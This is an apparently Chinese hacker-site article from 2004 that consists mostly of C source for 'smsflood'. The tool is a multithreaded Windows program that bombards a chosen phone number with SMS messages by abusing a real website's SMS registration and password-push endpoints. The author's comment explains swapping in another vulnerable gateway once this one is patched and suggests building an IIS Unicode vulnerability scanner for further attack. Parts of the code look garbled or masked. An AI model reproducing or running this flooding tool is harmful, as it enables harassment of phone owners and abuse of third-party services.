您的位置：首页 → 网络冲浪 → 黑客天空 → 短信攻击新思路

短信攻击新思路

时间：2004/10/8 16:38:00来源：本站整理作者：蓝点我要评论(0)

　　　　

短信攻击新思路

短信攻击新思路   /*说明:    作者:Yellow    Email:wjj2748_cn@sina.com    日期:2003年9月2日晚  *********************************************************************    命令行:  smsflood <手机号> <发送次数><回车>    程序运行时会查询服务器状态,当服务器状态为40x时可能程序里使用    的短信网关已将洞洞给补上了,因为服务器那里会有发送记录,可能管    理员会发现我们所做的,那时就要再找一个有洞洞网关,然后修改源程    序,再重新编译了.程序虽小,但使用了多线程、临界区、Winsock、    TCP/IP、HTTP协议等技术!是一个不错的网络编程例子程序哦!    这里只是提供一个思路,使用Windows Sockets编程可以让我们获得更多    的底层信息,比如在这个程序里,我们就会发现在服务器使用的是IIS 5.0    如果想进一步攻击,我们可以再编写一个UniCode漏洞扫描程序(该漏洞是    IIS所特有的).  **********************************************************************  */  #define _MT//多线程支持  #include   #include //memset()  #include   #include //getch()  #include //_beginthread,使用多线程函数  #include //socket(),bind(),connect,send(),recv().....,使用套接字函数  #pragma comment(lib,"ws2_32.lib")//连接套接字函数  #pragma comment(lib,"Libcmt.LIB")//连接多线程函数  //inifmt和sendfmt是程序使用的HTTP　POST方法数据包,用我写的listen80程序获得的  char inifmt[]="GET /asp/sms/reguse.asp?strMobilecode=%s HTTP/1.1\n"    "Accept: */*\n"    "Accept-Language: zh-cn\n"    "Accept-Encoding: gzip, deflate\n"    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\n"    "Host: sms.soufun.com\n"    "Connection: Keep-Alive\n\n";  char sendfmt[]="GET /asp/sms/pushpass.asp?strMobilecode=%s HTTP/1.1\n"  "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*\n"  "Accept-Language: zh-cn\n"  "Accept-Encoding: gzip, deflate\n"  "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\n"  "Host: sms.soufun.com\n"  "Connection: Keep-Alive\n\n";  char buffer[400]={0},buffer2[300]={0};  struct sockaddr_in server,client;  char mobile[11]={0};  int scount=0;  CRITICAL_SECTION beswap;  /***********************************************************************************************/  void do****amcc(void* parm)  {  EnterCriticalSection(&beswap);  SOCKET sfd;  scount++;  if((sfd=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET)  {  printf("为%d攻击线程分配套按字失败....\n",scount--);      LeaveCriticalSection(&beswap);  return ;  }  if(bind(sfd,(struct sockaddr *)(&client),sizeof(struct sockaddr))==SOCKET_ERROR)  {  printf("攻击线程%d地址绑定失败....\n",scount--);  LeaveCriticalSection(&beswap);  closesocket(sfd);  return ;  }  if(connect(sfd,(struct sockaddr*)&server,sizeof(struct sockaddr)))  {  printf("攻击线程%d在连接到服务器时失败....\n",scount--);  closesocket(sfd);  LeaveCriticalSection(&beswap);  return ;  }  printf("线程%d正在发送数据包到%s\n",scount,mobile);  memset(buffer,0,380);  printf("攻击线程 %d 正在初使化短信攻击数据......\n",scount);  wsprintf(buffer,inifmt,mobile);  send(sfd,buffer,sizeof(buffer),0);  printf("攻击线程 %d 正在发送攻击数据包......\n",scount);  wsprintf(buffer,sendfmt,mobile);  send(sfd,buffer,sizeof(buffer),0);  printf("攻击线程 %d 完成数据包发送,正在查询服务器状态......\a\n",scount);  recv(sfd,buffer2,240,0);  printf("服务器状态如下:\n%s\n",buffer2);  LeaveCriticalSection(&beswap);  Sleep(200);                                           }  /***********************************************************************************************/  void main(int argc,char **argv)  {  //1,初使化套接字以及地址和临界区变量  WSADATA data;  struct hostent *host=NULL;  int begin=0,thread=0;  if(argc!=3)  {  printf("smsflood  \a\n");  exit(-1);  }  if(WSAStartup(0x0202,&data)!=0)  {  printf("WSAStartup error:%d\n",WSAGetLastError());  exit(0);  }  memset((void*)&server,0,sizeof(struct sockaddr_in));  memset((void*)&client,0,sizeof(struct sockaddr_in));  server.sin_family=AF_INET;  server.sin_port=htons(80);  server.sin_addr.S_un.S_addr=inet_addr("202.108.253.37");  client.sin_addr.S_un.S_addr=htonl(INADDR_ANY);  client.sin_port=htons(0);  client.sin_family=AF_INET;  thread=atoi(argv[2]);  strcpy(mobile,argv[1]);  InitializeCriticalSection(&beswap);  //2,跟据用户输入启动发送线程  printf("\n短信洪水攻击程序 Ver 1.0.1.11\n\n作者:yellow\n\nEmail:wjj2748_cn@sina.com\n\n");  printf("初使化完成,是否开始攻击?(y/n)\a\n");  if(getch()=='y')  {  while(begin{  if(_beginthread(do****amcc, 0, NULL )==(long)-1)  continue;  else  begin++;  }  printf("攻击线程已经,请等待线程退出......\a\n");  }  //3,完成发送后,进行必要清理  getch();  printf("按任意键退出......\n");  getch();  WSACleanup();  DeleteCriticalSection(&beswap);  //4,退出应用程序  }

相关阅读 Mac和Windows哪个好 windows和mac os对比介绍Win10预览版怎么升级 Win10预览版升级方法厂商不再预装Win7或8.1系统，驱动人生帮您快速升级Mac移动硬盘安装win8 Mac将win装在移动硬盘使用教程windows10xboxone串流简单教程Windows Hello怎么用 Windows Hello使用设置教程win10怎么关闭自动更新 win10如何关闭自动更新Mac系统如何远程桌面到Windows系统

文章评论

查看所有0条评论>>

发表评论

我来说两句...

提交评论